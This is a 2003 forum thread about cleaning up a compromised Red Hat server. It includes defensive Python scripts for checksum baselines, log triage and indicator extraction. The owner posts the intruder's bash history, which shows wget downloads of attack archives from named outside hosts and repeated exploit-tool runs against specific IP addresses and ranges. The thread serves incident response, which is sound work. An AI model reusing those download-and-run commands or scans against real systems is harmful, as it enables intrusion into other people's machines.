
Intruder


weifan (IS-IT--Management), Sep 6, 2003
I have had Red Hat 7.1 on my server for years. However, I recently found out that an intruder got into my box, changed my password and installed something on my system. My system was busy scanning the whole world before I unplugged the cable. I also got a complaint from my ISP.

Right now, I can change my password by using single-user mode. I need to clean up whatever he did on my system. Can someone please direct me in how to do it? I cannot reinstall my box, since I have put some important stuff on it.

TIA

Roger
 
Unless you are very technically savvy about the ins and outs of resecuring a server, you'd probably come out ahead on effort by just backing up your data somewhere and reinstalling.

Once someone has gotten root access to your box, there's no end to the damage he can do. Suppose this person recompiled the "ls" command so that it does something in the background every time it produces a file listing in the foreground? How would you know, unless you knew the file size and checksum of the original file?

Want the best answers? Ask the best questions: TANSTAAFL!!
 
Use the history file to find out what he did and undo it.
Or ssh to your own box and press the up arrow key; it will show the commands that the intruder ran.
 
The more I learn about rootkits, the more paranoid I get. A good rootkit will:

- Modify all or almost all system monitoring tools by recompiling them from trojanned sources. Think anything from ls, top, touch, ps to vi, cat, grep, etc.
- Either create another UID 0 account, or obtain the root password (either by keystroke logging or password cracking), so no alterations of the /etc/passwd and /etc/shadow files will be detected
- Nuke/compromise known checksum-based integrity checkers by modifying the database directly (you did keep a copy of the Tripwire DB off the system, rriigghhttt?)
- Install backdoors / bots / foo
- Fix the original exploit so the new owner can't have his shiny new box ownzored back.

Learning the extent of the damage will probably be a learning experience, but it depends on how much time you are willing to give it: can you spare the infected box and rebuild another while you study your "patient"?

_____________________________
when someone asks for your username and password, and much *clickely clickely* is happening in the background, know enough that you should be worried.
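The two posts above make the same point from different sides: a rootkit replaces ls, ps, top and friends, and if it can it also edits the integrity checker's own database, so the only checksum you can trust is one written while the box was known-good, stored off the box, and compared from a clean environment (a rescue CD, or the disk mounted read-only on another machine). The script below is an added example, not from the thread or any tool it mentions: it builds a SHA-256 baseline of the files under a set of directories, stores it as JSON, and reports modified, added and removed files. The directory names and the command-line layout are the example's own assumptions; on a real box you would baseline at least /bin, /sbin, /usr/bin, /usr/sbin and /lib.

```python
"""Build and compare a checksum baseline of system binaries (added example).

Assumptions (not from the thread): the baseline JSON lives off the host,
and the "check" run happens from a trusted system with the suspect
filesystem mounted under some root path.
"""
import hashlib
import json
import stat
from pathlib import Path


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, subdirs=("bin", "sbin")):
    """Return {relative_path: {"sha256", "size", "mode"}} for regular files.

    Symlinks are skipped; a rootkit that swaps a binary for a symlink will
    show up as "removed" rather than silently matching.
    """
    baseline = {}
    for sub in subdirs:
        base = Path(root) / sub
        if not base.is_dir():
            continue
        for p in sorted(base.rglob("*")):
            if p.is_symlink() or not p.is_file():
                continue
            st = p.lstat()
            baseline[str(p.relative_to(root))] = {
                "sha256": file_digest(p),
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
            }
    return baseline


def save_baseline(baseline, out_path):
    Path(out_path).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def compare(baseline, current):
    """Classify differences: modified (hash, size or mode), added, removed."""
    report = {"modified": [], "added": [], "removed": []}
    for rel, meta in baseline.items():
        now = current.get(rel)
        if now is None:
            report["removed"].append(rel)
        elif now != meta:
            report["modified"].append(rel)
    for rel in current:
        if rel not in baseline:
            report["added"].append(rel)
    return report


if __name__ == "__main__":
    import sys
    # usage: baseline.py build <root> <out.json>
    #        baseline.py check <root> <baseline.json>   (exit 1 on any difference)
    cmd, root, store = sys.argv[1:4]
    if cmd == "build":
        save_baseline(build_baseline(root), store)
    else:
        result = compare(load_baseline(store), build_baseline(root))
        for kind, paths in result.items():
            for rel in paths:
                print(f"{kind}: {rel}")
        sys.exit(1 if any(result.values()) else 0)
```

Run "build" against "/" on the freshly installed box and copy the JSON somewhere the box cannot reach; later, boot a rescue system, mount the disk read-only at, say, /mnt/suspect, and run "check /mnt/suspect baseline.json". Hashing from the live, suspect system with its own python and libc is exactly the situation the posts warn about, so the tool is only as good as the environment it runs in.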
 
Look in /var/log:
Check out the messages, secure, and xferlog files.
Plug your cable back in temporarily and run top to see what programs are running.
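What you are looking for in /var/log/secure is logins and service connections from hosts you do not recognise, and in particular a source that fails a few times and then succeeds. The script below is an added example, not from the thread: it parses the sshd "Accepted/Failed password" and xinetd "START: service" lines and summarises activity per source address, flagging anything outside a list of addresses you trust. The log lines are constructed for the example in the syslog layout Red Hat 7.x used; real sshd and xinetd message formats vary by version, so the regexes are a starting point rather than a finished parser. Run it on a copy of the logs taken off the box, since on a rooted host the logs themselves may have been edited.

```python
"""Triage a /var/log/secure-style log for logins from unexpected hosts (added example).

SAMPLE_SECURE is constructed for this example, not taken from the thread.
"""
import re
from collections import defaultdict

SAMPLE_SECURE = """\
Sep  1 02:14:07 host sshd[2101]: Accepted password for roger from 10.0.0.5 port 40112 ssh2
Sep  1 03:55:41 host xinetd[412]: START: ftp pid=2203 from=203.0.113.77
Sep  1 03:56:02 host xinetd[412]: START: ftp pid=2204 from=203.0.113.77
Sep  1 03:56:30 host sshd[2210]: Failed password for root from 198.51.100.9 port 1041 ssh2
Sep  1 03:56:33 host sshd[2210]: Failed password for root from 198.51.100.9 port 1041 ssh2
Sep  1 03:56:39 host sshd[2210]: Accepted password for root from 198.51.100.9 port 1041 ssh2
Sep  1 03:58:10 host su(pam_unix)[2260]: session opened for user root by roger(uid=500)
"""

# "Mon DD HH:MM:SS host prog[pid]: message"
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[\w().-]+)\[\d+\]: (?P<msg>.*)$"
)
SSH = re.compile(
    r"^(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
XINETD = re.compile(r"^START: (?P<service>\S+) pid=\d+ from=(?P<ip>[\d.]+)")


def parse_secure(text):
    """Yield one dict per recognised sshd or xinetd event; other lines are ignored."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        msg = m["msg"]
        s = SSH.match(msg)
        if s:
            yield {"ts": m["ts"], "kind": "ssh", "result": s["result"],
                   "user": s["user"], "ip": s["ip"]}
            continue
        x = XINETD.match(msg)
        if x:
            yield {"ts": m["ts"], "kind": "xinetd", "service": x["service"], "ip": x["ip"]}


def summarize(events, trusted):
    """Per source IP: accepted SSH users, failed SSH attempts, services touched, time span.

    Returns (all_sources, suspicious_sources); suspicious is everything not in `trusted`.
    """
    by_ip = defaultdict(lambda: {"accepted": [], "failed": 0, "services": set(),
                                 "first": None, "last": None})
    for e in events:
        rec = by_ip[e["ip"]]
        rec["first"] = rec["first"] or e["ts"]
        rec["last"] = e["ts"]
        if e["kind"] == "ssh":
            if e["result"] == "Accepted":
                rec["accepted"].append(e["user"])
            else:
                rec["failed"] += 1
        else:
            rec["services"].add(e["service"])
    suspicious = {ip: rec for ip, rec in by_ip.items() if ip not in trusted}
    return dict(by_ip), suspicious


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SECURE
    _, suspicious = summarize(parse_secure(text), trusted={"10.0.0.5"})
    for ip, rec in sorted(suspicious.items()):
        print(f"{ip}: accepted={rec['accepted']} failed={rec['failed']} "
              f"services={sorted(rec['services'])} {rec['first']} .. {rec['last']}")
```

In the constructed sample, 198.51.100.9 fails twice as root and then gets in, which is the pattern you want surfaced; the FTP connections from 203.0.113.77 are worth cross-checking against xferlog for what was transferred.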
 
Thank you for your help.

I will try to educate myself from whatever you posted here.

Roger
 
I still need your help!

Since I cannot reinstall my box, I have to fix it.

I found out the intruder created a subdirectory "...]" under root and left some files.

Some of the files:
Am.tgz
KaX.tgz
Liviu.tgz
apache.tgz
cnxmass.tgz
liv.tgz
mefy.tgz
psyBNC.tar.gz
stringer.tar.gz
superwu
ussl.tgz
windmilk.tgz

I also found that the file .bash_history under root recorded whatever he did on my Linux box.

Can anyone tell me what he tried to do? Can I still get my Linux box back? How do I do it?

TIA

Roger
 
Everybody has told you, and will still tell you, to FORMAT the drive(s) and rebuild the box.

Any attempts to "save" a hacked/rooted box (without a tremendous amount of experience) are foolish. Rootkits often leave their payloads in more than just one place.

Not dissing you for being hacked, but you've spent 18 days trying to save a box that sleipnir214 rightfully told you to kill off and reinstall immediately.

SPAMMERS ARE NOW USING HACKED BOXES TO SPREAD SPAM AND ATTACK RBL/DNSBL LISTS WITH DENIAL OF SERVICE TO SHUT THEM DOWN.

PLEASE do not contribute to the problems on the Internet.

Good luck! :)

Surfinbox.com Business Internet Services - National Dialup, DSL, T-1 and more.
 
All of those files are trojanned applications/rootkits that have most probably been installed on your system.

Check the bash history file and post it here please... PLEASE CUT IT DOWN TO THE PART WHERE HE DID STUFF (don't copy-paste the whole thing).

 
Before I can post the file .bash_history, I need to know how to get the file. The only way I can get it is by writing it out by hand.

Roger
 
Put in a diskette in your floppy drive.

$mount /dev/fd0 /some/directory/
$su
# cp /root/.bash_history /some/directory
#su user
$umount /dev/fd0

Take out the floppy and look at it on ANOTHER MACHINE (because if your machine has been rooted, any application on it could have been trojanned).


 
This is the first part of the file:
./portmap
./portmap
./portmap
uptime
ls
cd ...]
ls
wget balder.prohosting.com/tzonfi/windmilk.tgz
wget balder.prohosting.com/tzonfi/tzonfi/windmilk.tgz
tar -xzvf windmilk.tgz
./superwu 61.220.99.170 21
./superwu 206.166.206.250 21
./superwu 61.80.0.0
cd ...]
ls
./superwu 61.110.0.0
./superwu 61.110.0.0
sh
./superwu 61.110.0.0
bash
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 61.110.0.0
./superwu 61.210.0.0
./superwu 61.211.252.80
wget kastorex.org/KaX.tgz
ls
mv verboot/ liv
ls
tar -cf liv.tar liv/; gzip -9 liv.tar; mv liv.tar.gz liv.tgz
ls
ftp
./superwu 61.211.252.80
./superwu 61.211.252.81
uptime
cd ...]
ls
./superwu 203.124.108.252 21
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 203.124.108.252 21
ls
./superwu 210.217.90.14 21
./superwu 210.217.90.14 21
rm - rf superwu
tar zxvf windmilk.tgz
./superwu 210.217.90.14 21
./superwu 61.80.51.145 21
./superwu 205.240.74.187 21
./superwu 61.111.18.27 21
./superwu 61.11.18.27 21
./superwu 61.11.18.27 21
./superwu 61.11.18.27 21
./superwu 61.211.252.80 21
./superwu 61.211.252.80
./superwu 61.211.252.81
cd ...]
ls
./superwu 200.87.144.100 21
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 200.87.144.100 21
./superwu 66.252.11.231
./superwu 68.165.75.123 21
./superwu 68.165.99.225
cd ...]
ls
./superwu 68.165.99.225
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 68.165.99.225
./superwu 68.165.99.226
PATH=:pATH
"atl "
exit
cd ...]
./superwu 68.165.99.225
./superwu 68.120.226.200
./superwu 68.120.226.200
./superwu 68.120.226.200
./superwu 68.120.226.20 21
./superwu 68.120.226.20 21
./superwu 68.120.226.20 21
./superwu 68.120.226.20 21
./superwu 204.60.97.66
./superwu 217.32.198.201 21
./superwu 217.132.151.172
mkdir .bb
cd .bb
wget tar zxvf atl.tgz
cd atl
pico psybnc.conf
sh
cd ...]
ls

Does anyone want the whole thing?
Thank you for your help!

Roger
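The history as posted is already a usable indicator list: it names what was downloaded (wget), what was unpacked (tar), and which addresses "./superwu" was pointed at, many of them with port 21 (FTP) as the second argument. The script below is an added example, not from the thread: it walks a history file and pulls those three things out, so there is something concrete to hand to the ISP and to the owners of the targeted addresses. The embedded text is an excerpt of the history posted above. Two caveats, both assumptions of the example rather than facts the thread states: the name and the port suggest an FTP server exploit, but the page does not say what superwu actually does; and an address ending in .0.0 is treated as a range sweep only because that is how it reads here. Also note what bash history cannot tell you: it records only what was typed interactively in that shell, not commands run from scripts, other shells, or sessions with history turned off, so it is a lower bound on the activity.

```python
"""Extract indicators from an intruder's .bash_history (added example).

HISTORY_EXCERPT is a subset of the history posted in the thread above.
"""
import re
from collections import Counter

HISTORY_EXCERPT = """\
./portmap
uptime
cd ...]
wget balder.prohosting.com/tzonfi/windmilk.tgz
tar -xzvf windmilk.tgz
./superwu 61.220.99.170 21
./superwu 206.166.206.250 21
./superwu 61.80.0.0
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 61.80.0.0
wget kastorex.org/KaX.tgz
mkdir .bb
cd .bb
pico psybnc.conf
"""

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
ARCHIVE_SUFFIXES = (".tgz", ".tar.gz", ".tar")


def parse_history(text):
    """Return downloads, archives handled, superwu targets, dirs used, other ./tools run."""
    found = {
        "downloads": [],      # URLs given to wget
        "archives": [],       # archive names given to tar
        "targets": Counter(), # (ip, port-or-None) -> number of times superwu was run at it
        "dirs": [],           # arguments to mkdir/cd (hiding places like "...]" and ".bb")
        "other_tools": Counter(),  # any other ./something that was executed
    }
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        cmd, args = parts[0], parts[1:]
        if cmd == "wget":
            found["downloads"] += [a for a in args if "/" in a]
        elif cmd == "tar":
            found["archives"] += [a for a in args if a.endswith(ARCHIVE_SUFFIXES)]
        elif cmd == "./superwu":
            m = IPV4.match(args[0]) if args else None
            if m:
                port = args[1] if len(args) > 1 and args[1].isdigit() else None
                found["targets"][(m.group(0), port)] += 1
        elif cmd in ("mkdir", "cd") and args:
            found["dirs"].append(args[0])
        elif cmd.startswith("./"):
            found["other_tools"][cmd] += 1
    return found


def target_report(found):
    """Rows of (ip, port or '-', 'range'|'host', count), sorted by address.

    The range/host label is a heuristic (assumption): x.y.0.0 reads as a sweep.
    """
    rows = []
    items = sorted(found["targets"].items(), key=lambda kv: (kv[0][0], kv[0][1] or ""))
    for (ip, port), n in items:
        kind = "range" if ip.endswith(".0.0") else "host"
        rows.append((ip, port or "-", kind, n))
    return rows


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else HISTORY_EXCERPT
    found = parse_history(text)
    print("downloads:", found["downloads"])
    print("archives:", sorted(set(found["archives"])))
    print("dirs:", found["dirs"])
    print("other tools:", dict(found["other_tools"]))
    for ip, port, kind, n in target_report(found):
        print(f"target {ip:<16} port {port:<3} {kind:<5} x{n}")
```

Point it at the full history copied off the box ("python3 history_iocs.py bash_history.txt") rather than the excerpt; the same address appearing both with and without a port, as happens with 61.211.252.80 in the full listing, is handled as two separate rows.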
 
ooohhhh boy.
You are quite fucked, man, sorry to say it as crudely as that, but it's the truth. I dunno what all those tgz files have as payload, but just looking at the list makes me really, REALLY uncomfortable. The only blessing you should be able to count on is the fact that whoever did this was most probably a script kiddie, since he did not wipe the history logs.

OK, save all the tgz files someplace (I'll probably sacrifice a box to see what those things could do and report on it for curiosity's sake), along with any logs and important data you may need, and nuke the box. Save the data, kill the box.

*hears protestations about this being an important server for xyz reason*
No no, I don't give a damn about this being an important server, you NUKE THE !@#$!@#$ out of it, NOW. Delete all the partitions on that hard disk: every single one of them.

Then reinstall from scratch. And make sure you keep your accessible executables fully patched. Thedaver is right: this box should have died last week. Now do us all a favor and proceed with the last rites...

He's dead Jim
Dr. McCoy

 